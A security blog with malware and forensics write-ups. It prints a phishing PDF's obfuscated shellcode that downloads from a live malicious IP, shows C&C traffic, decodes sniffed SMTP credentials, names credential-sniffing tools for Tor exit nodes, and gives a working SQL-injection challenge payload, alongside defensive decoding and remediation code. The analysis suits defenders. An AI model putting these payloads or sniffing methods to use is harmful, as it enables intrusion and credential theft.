Friday, January 22, 2010

Malware is not hosted here.

Even though Symantec claims the site is infected with malware - I assure you - it is not.

Symantec notes that my previous post quoted a snip of Javascript that has been used in malware.

I've modified the javascript snip so that Symantec doesn't trip. Let me know if that doesn't fix it.

Thursday, November 26, 2009

Received an email in my spam box this morning with a link:

http://www.facebook.com.ferdasxe.be/usersdirectory/LoginFacebook.php?ref=[32 Char Number]&email=[My Email]

The domain resolves to a number of IPs:

www.facebook.com.ferdasxe.be. 1783 IN A 190.120.139.2
www.facebook.com.ferdasxe.be. 1783 IN A 190.247.140.107
www.facebook.com.ferdasxe.be. 1783 IN A 201.17.33.210
www.facebook.com.ferdasxe.be. 1783 IN A 201.165.72.35
www.facebook.com.ferdasxe.be. 1783 IN A 201.226.241.26
www.facebook.com.ferdasxe.be. 1783 IN A 210.112.142.61
www.facebook.com.ferdasxe.be. 1783 IN A 213.248.149.69
www.facebook.com.ferdasxe.be. 1783 IN A 60.50.84.69
www.facebook.com.ferdasxe.be. 1783 IN A 115.252.47.55
www.facebook.com.ferdasxe.be. 1783 IN A 117.242.112.254
www.facebook.com.ferdasxe.be. 1783 IN A 186.32.89.215
www.facebook.com.ferdasxe.be. 1783 IN A 189.105.95.34
www.facebook.com.ferdasxe.be. 1783 IN A 189.179.6.137
www.facebook.com.ferdasxe.be. 1783 IN A 190.7.132.216
www.facebook.com.ferdasxe.be. 1783 IN A 190.37.112.49

An iframe on this page grabs /sv/in.php from 193.104.27.234

Javascript within in.php grabs /sv/xd/pdf.pdf from 193.104.27.234

80758e30f8beb7fa79f6346b85f6cf31 pdf.pdf

Which contains more javascript:


(Snipped)
{
var vvpethya =unescape("

%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%u33AB%uB8C0%u6461%u0000%u6850%u6854%u6572%u2435%u691C%u5074%u5354%uAAB8%u0DFC%uFF7C%u0455%uF88B%uC483%uB00C%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u4CC2%u5052%u36B8%u2F1A%uFF70%u0455%u575B%uB856%uFE98%u0E8A%u55FF%u6A04%uFF00%u68D7%u7474%u3A70%u2F2F%u3931%u2E33%u3031%u2E34%u3732%u322E%u3433%u732F%u2F76%u6F6C%u6461%u702E%u7068");
(Snipped)

This grabs load.php from the /sv/ directory on host 193.104.27.234. This IP is hosted in Russia.
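For anyone wanting to check that "load.php" claim without executing the PDF's script, here is a small decoder I've added (not from the original post): it reverses JavaScript's unescape() encoding, where each %uXXXX is a 16-bit unit written to memory low byte first, then runs a `strings`-style pass over the bytes to pull out the download URL. SHELLCODE_TAIL is only the last 17 units of the string quoted above, which is the part that spells the URL; the rest of the payload is deliberately not reproduced.

```python
import re

# Tail of the unescape() string quoted above (the last 17 %u-units).
# Only this fragment is reproduced here; it encodes the fetch URL.
SHELLCODE_TAIL = ("%u68D7%u7474%u3A70%u2F2F%u3931%u2E33%u3031%u2E34%u3732"
                  "%u322E%u3433%u732F%u2F76%u6F6C%u6461%u702E%u7068")


def decode_unescape(s: str) -> bytes:
    """Reverse JavaScript's unescape(): '%uXXXX' is a 16-bit code unit that
    lands in memory little-endian (low byte first), '%XX' is a single byte,
    and anything else passes through as its Latin-1 byte value. Whitespace
    is dropped so a string pasted across several lines still decodes."""
    s = "".join(s.split())
    out = bytearray()
    i = 0
    while i < len(s):
        if s.startswith("%u", i) and i + 6 <= len(s):
            out += int(s[i + 2:i + 6], 16).to_bytes(2, "little")
            i += 6
        elif s[i] == "%" and i + 3 <= len(s):
            out.append(int(s[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(ord(s[i]) & 0xFF)
            i += 1
    return bytes(out)


# Runs of four or more printable ASCII bytes, same idea as the strings(1) tool.
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")


def printable_strings(data: bytes) -> list[str]:
    """Return every printable ASCII run of length >= 4 found in data."""
    return [m.decode("ascii") for m in PRINTABLE.findall(data)]


URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w.\-/]*)?")


def extract_urls(encoded: str) -> list[str]:
    """Decode an unescape() payload and list any URLs it carries, so the
    second-stage download can be blocked or hunted for without running it."""
    urls = []
    for text in printable_strings(decode_unescape(encoded)):
        urls.extend(URL_RE.findall(text))
    return urls


if __name__ == "__main__":
    print(extract_urls(SHELLCODE_TAIL))
```

Feed it the whole unescape() string from a sample and you get the same answer a debugger would give for the URL, minus the risk of running the thing; the IPs in the output go straight onto a block list.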

C&C Traffic:

POST /beslip/gate.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 193.104.41.68
....
snip
....
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 26 Nov 2009 18:36:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6


Tuesday, November 24, 2009

Network Forensics Contest - Part II Answers

Woohoo....I got them all right. I kind of figured I would though - if not, I should find a new job.

I'm talking about ForensicsContest.com - a site to help educate the masses and keep security teams sharp.

If you haven't done packet capture analysis in a while, I suggest you visit the site and start from the beginning.

Linux Walkthru:

1. What is Ann’s email address?
2. What is Ann’s email password?
3. What is Ann’s secret lover’s email address?
4. What two items did Ann tell her secret lover to bring?
5. What is the NAME of the attachment Ann sent to her secret lover?
6. What is the MD5sum of the attachment Ann sent to her secret lover?
7. In what CITY and COUNTRY is their rendez-vous point?
8. What is the MD5sum of the image embedded in the document?


First things first, verify the MD5SUM of the evidence file:

$ md5sum evidence02.pcap
cfac149a49175ac8e89d5b5b5d69bad3 evidence02.pcap

Next, viewing the packet capture with TCPDump, grab the email auth:

tcpdump -Alnqvvvs0 -r evidence02.pcap port 587 |less

.....

250-AUTH=LOGIN PLAIN XAOL-UAS-MB
250-AUTH LOGIN PLAIN XAOL-UAS-MB
250-STARTTLS
250-CHUNKING
250-BINARYMIME
250-X-AOL-FWD-BY-REF
250-X-AOL-DIV_TAG
250-X-AOL-OUTBOX-COPY
250 HELP

06:35:31.222415 IP (tos 0x0, ttl 128, id 126, offset 0, flags [DF], proto TCP (6), length 52) 192.168.1.159.1036 > 64.12.102.142.587: tcp 12
E..4.~@....d....@.f....K....&6.3P.......AUTH LOGIN

06:35:31.222996 IP (tos 0x0, ttl 127, id 7762, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.R......@.f......K..&6.3....P...x...
06:35:31.332979 IP (tos 0x0, ttl 127, id 7763, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.S......@.f......K..&6.3....P....J..334 VXNlcm5hbWU6

06:35:31.333745 IP (tos 0x0, ttl 128, id 127, offset 0, flags [DF], proto TCP (6), length 66) 192.168.1.159.1036 > 64.12.102.142.587: tcp 26
E..B..@....U....@.f....K....&6.EP...O...c25lYWt5ZzMza0Bhb2wuY29t

06:35:31.334435 IP (tos 0x0, ttl 127, id 7764, offset 0, flags [none], proto TCP (6), length 40) 64.12.102.142.587 > 192.168.1.159.1036: tcp 0
E..(.T......@.f......K..&6.E....P...x...
06:35:31.444079 IP (tos 0x0, ttl 127, id 7765, offset 0, flags [none], proto TCP (6), length 58) 64.12.102.142.587 > 192.168.1.159.1036: tcp 18
E..:.U......@.f......K..&6.E....P....6..334 UGFzc3dvcmQ6

06:35:31.444690 IP (tos 0x0, ttl 128, id 128, offset 0, flags [DF], proto TCP (6), length 54) 192.168.1.159.1036 > 64.12.102.142.587: tcp 14
E..6..@....`....@.f....K....&6.WP...S
..NTU4cjAwbHo=

Pay special attention to the 334 status code:

334 VXNlcm5hbWU6 => Username:

334 UGFzc3dvcmQ6 => Password:

Immediately following each 334 status code is another base64 encoded string:

c25lYWt5ZzMza0Bhb2wuY29t => sneakyg33k@aol.com

NTU4cjAwbHo= => 558r00lz

As you can see, you have the first two answers - this isn't going to be too hard. (Yes, I know about tools like ettercap, mailsnarf and dsniff that will extract this data off the wire - let's pretend we don't know about them.)

Looking at the packet capture you'll see an email to sec558@gmail.com, but read carefully: the question is "What is Ann's secret lover's email address?" The email to sec558 doesn't appear to be loving:

Sorry-- I can't do lunch next week after all. Heading out of town. Another time! -Ann.

A little further into the packet we see another email, this time to mistersecretx@aol.com:

Hi sweetheart! Bring your fake passport and a bathing suit. Address attached. love, Ann.

With an attachment:

Content-Transfer-Encoding: base64.
Content-Disposition: attachment;.
filename="secretrendezvous.docx"

Using Wireshark, follow the TCP stream for this packet and extract the base64-encoded attachment.

I used openssl to decode the base64 content like so:

$ openssl base64 -d -in email-attachment.b64 -out secretrendezvous.docx

DOCX files are also PKZIP archives, as the "file" command shows:

$ md5sum secretrendezvous.docx; file secretrendezvous.docx
9e423e11db88f01bbff81172839e1923 secretrendezvous.docx
secretrendezvous.docx: Zip archive data, at least v2.0 to extract

By unzipping the file, you can extract image1.png:

$ md5sum image1.png; file image1.png
aadeace50997b1ba24b09ac2ef1940b7 image1.png
image1.png: PNG image, 756 x 439, 8-bit/color RGB, non-interlaced

Which gives you the last two answers.
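The whole walkthrough above (decode the AUTH LOGIN prompts and replies, pull the base64 attachment out of the DATA block, treat the .docx as a zip and hash what's under word/media/) can be scripted. This is an added example, not part of the contest or the original post: the AUTH LOGIN tokens are the ones from the capture above, but the message body and the .docx are constructed in memory here so it runs offline, and IMAGE_BYTES is a placeholder standing in for image1.png (so its MD5 is not the contest answer).

```python
import base64
import hashlib
import io
import re
import zipfile
from email import message_from_string

# --- Constructed sample (not the contest capture) ---
IMAGE_BYTES = b"\x89PNG\r\n\x1a\n" + b"constructed placeholder standing in for image1.png"


def build_docx() -> bytes:
    """A .docx is a zip; pictures live under word/media/ (constructed stand-in)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/media/image1.png", IMAGE_BYTES)
    return buf.getvalue()


DOCX_BYTES = build_docx()

# Client and server lines of a submission session, as tcpdump -A would show them
# after the STARTTLS-less AUTH LOGIN above. Base64 tokens are from the capture.
SMTP_SESSION = "\n".join([
    "334 VXNlcm5hbWU6",
    "c25lYWt5ZzMza0Bhb2wuY29t",
    "334 UGFzc3dvcmQ6",
    "NTU4cjAwbHo=",
    "235 Authentication successful",
    "MAIL FROM:<sneakyg33k@aol.com>",
    "RCPT TO:<mistersecretx@aol.com>",
    "DATA",
    "From: sneakyg33k@aol.com",
    "To: mistersecretx@aol.com",
    "Subject: rendezvous",
    "MIME-Version: 1.0",
    'Content-Type: multipart/mixed; boundary="b1"',
    "",
    "--b1",
    "Content-Type: text/plain",
    "",
    "Hi sweetheart! Bring your fake passport and a bathing suit. Address attached. love, Ann.",
    "--b1",
    "Content-Type: application/octet-stream",
    "Content-Transfer-Encoding: base64",
    'Content-Disposition: attachment; filename="secretrendezvous.docx"',
    "",
    base64.encodebytes(DOCX_BYTES).decode().rstrip("\n"),
    "--b1--",
    ".",
    "",
])


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def decode_auth_login(session: str) -> dict:
    """Each '334 <b64>' server prompt is followed by the client's base64 reply;
    decode both and key the reply by the prompt text (Username/Password)."""
    lines = session.splitlines()
    creds = {}
    for i, line in enumerate(lines):
        m = re.match(r"334 (\S+)$", line)
        if m and i + 1 < len(lines):
            prompt = base64.b64decode(m.group(1)).decode().rstrip(": ").lower()
            creds[prompt] = base64.b64decode(lines[i + 1]).decode()
    return creds


def extract_attachment(session: str) -> tuple[str, bytes]:
    """Cut the message out of the DATA block and return (filename, raw bytes)
    of the first attachment, letting the email module undo the base64."""
    data = session.split("\nDATA\n", 1)[1].split("\n.\n", 1)[0]
    msg = message_from_string(data)
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            return part.get_filename(), part.get_payload(decode=True)
    raise ValueError("no attachment found")


def embedded_media(docx: bytes) -> dict:
    """Open the .docx as a zip and MD5 every member under word/media/."""
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        return {name: md5_hex(z.read(name))
                for name in z.namelist() if name.startswith("word/media/")}


def analyse(session: str) -> dict:
    creds = decode_auth_login(session)
    name, blob = extract_attachment(session)
    return {"username": creds["username"], "password": creds["password"],
            "attachment": name, "attachment_md5": md5_hex(blob),
            "media": embedded_media(blob)}


if __name__ == "__main__":
    for key, value in analyse(SMTP_SESSION).items():
        print(f"{key}: {value}")
```

The same AUTH LOGIN decoder doubles as a cheap detector for mail clients that still submit credentials without STARTTLS: anything it can decode off port 587 was sent in the clear.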



Total time from download to completion, including screenshotting all of my work, took less than 15 minutes.

I would have had enough time to meet Ann at the airport, steal her identity and enjoy my trip to Mexico! :)


Reloading the old site

Many of you know that I used to have another blog and some of you may notice that it disappeared. It's still there, if you look hard enough, but I won't be making any updates.

I just don't have the time like I used to, and I feel a blog shouldn't be "professional" only. So here goes - the old old blog is new again, and if you like what I have to write, you're welcome to follow. Don't expect me to stay on topic - and don't expect updates too frequently. I'll put up a Twitter feed on the right-hand side of the page for those who choose to follow me there.


Tuesday, September 11, 2007

Domain Brute Forcer

This morning I found myself in a position where I needed to run a pentest without access to the internet. Sadly I also left my toolkit (laptop) at home, as I wasn't expecting to do this test.

Since I didn't have access to the internet, I couldn't download one of the many domain brute forcing tools...and that is exactly what I needed.

Since I had some time on my hands, I tossed together my own brute forcer. It's not well coded, but it's proof that you really can pull tools out of your arse in a pinch.


Grab the script here.

Monday, September 10, 2007

Password Sniffing With TOR.

This afternoon I was approached by an individual online who wanted to know if I could tell him how to sniff passwords off TOR like explained here:

http://www.theregister.co.uk/2007/09/10/misuse_of_tor_led_to_embassy_password_breach/

Of course he (or she) claimed that they wanted to prove it couldn't be done - yea right.

However, it's really not all that hard. Many TOR exit nodes sniff their exit traffic. Most do so to protect themselves, some do so to capture credentials...there have even been rumors of the feds doing it to locate child porn sites.

Whatever the reason, using Wireshark is a quick and easy way to sniff all the traffic; however, if you have a busy exit node, you'll fill up your hard drive pretty quickly, even if you only capture a few hundred bytes of each packet.

So back to the question at hand....using ettercap or dsniff will help you capture credentials without recording the full packet.

Now go play nice.

Saturday, August 18, 2007

Dare Your Mind

This evening I was approached by an internet drifter about a SQL injection problem. He was playing an online hacker game located at http://www.dareyourmind.net.

His problem was with the page http://www.dareyourmind.net/menu.php?page=sqlexploit3.

At first glance I thought "SQL exploit", then I read the information left by the author:

Listito has modified his girls' contact PHP form to obtain phone numbers quickly... Because you do not have the right session cookie, you cannot see the phone list, but you still have to find the phone number of Nicole to validate this chall!

So my next thought was 'oh, session hijacking...TCP?....cookie...hmmm...XSS?'

The drifter assured me that I didn't have to try XSS, he'd found some SQL injection:

1 union all select *,null,null,null from information_schema.tables #

Which didn't quite work. I promised to take a look, and went off to dinner.

Once I returned, the first thing I did was open WebScarab and intercept all GETs and POSTs from my browser. Wow, this site was prepared. It tossed in lots of background noise, so I disabled "GET" and focused only on POST, which is where the id=1 string was passed to http://www.dareyourmind.net/real/sql3/list.php. (Warning, this is hardly work safe!)

As it turns out, there are four columns. I was already told that much.

After little more than 30 minutes, the correct string is: (hidden, black text on black background, highlight below the 'spoiler' snips)

--SPOILER BELOW--

id=3 union select null,Phone,null,null from __User__SQL_THREE_ where ID = 3 --

Which means the answer is: 1425753498 (though that will probably change when the author gets word that it has been posted.)

--SPOILER ABOVE--

No, I'm not trying to ruin the game. You should go figure out how each statement works, and how to SQL inject on your own. This is a spoiler for those lamers who can't figure it out. I won't post any more answers from the dareyourmind.net challenges, and I won't help you if you track me down. I was bored, this challenge was tempting...and it has been a while since I posted something.
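Since the point of the challenge is understanding why that string works, here is the bug itself next to its fix, as an added example that is not code from dareyourmind.net: a toy sqlite schema (table and column names constructed for this example, apart from the __User__SQL_THREE_ name taken from the payload above; the phone number is a placeholder) with the id parameter pasted into the query the way the vulnerable page must be doing it, beside the parameterised version the site should have used. The four-column union from the spoiler pulls the Phone column through the vulnerable query and returns nothing at all through the fixed one.

```python
import sqlite3

# Constructed toy schema standing in for the challenge's contact form.
# Table/column names and the phone number are invented for this example.
def build_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE contacts(ID INTEGER, Name TEXT, City TEXT, Note TEXT);
        CREATE TABLE __User__SQL_THREE_(ID INTEGER, Login TEXT, Phone TEXT, Session TEXT);
        INSERT INTO contacts VALUES (1, 'Alice', 'Paris', ''), (3, 'Nicole', 'Lyon', '');
        INSERT INTO __User__SQL_THREE_ VALUES (3, 'nicole', '555-0100', 'session-placeholder');
    """)
    return db


# The injection string from the spoiler above.
PAYLOAD = "3 union select null,Phone,null,null from __User__SQL_THREE_ where ID = 3 --"


def list_vulnerable(db: sqlite3.Connection, user_id: str) -> list:
    """The pattern the challenge page exhibits: the id parameter is pasted
    straight into the SQL text, so it is parsed as SQL, not as a value."""
    sql = f"SELECT ID, Name, City, Note FROM contacts WHERE ID = {user_id}"
    return db.execute(sql).fetchall()


def list_hardened(db: sqlite3.Connection, user_id: str) -> list:
    """Parameterised: the driver ships the value separately from the query,
    so it can only ever be compared against ID, never parsed as SQL.
    A string that is not a number simply matches no row."""
    return db.execute(
        "SELECT ID, Name, City, Note FROM contacts WHERE ID = ?", (user_id,)
    ).fetchall()


def leaked_phones(rows: list) -> list:
    """Rows whose Name column came from the union rather than contacts:
    the ID column is NULL because the payload selected null for it."""
    return [row[1] for row in rows if row[0] is None]


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", list_vulnerable(db, PAYLOAD))
    print("hardened:  ", list_hardened(db, PAYLOAD))
```

Validating that id is an integer before it ever reaches the query (int(user_id), rejecting anything else) is a second, independent layer; the parameter binding is the one that actually closes the hole, because it works even when the value legitimately has to be text.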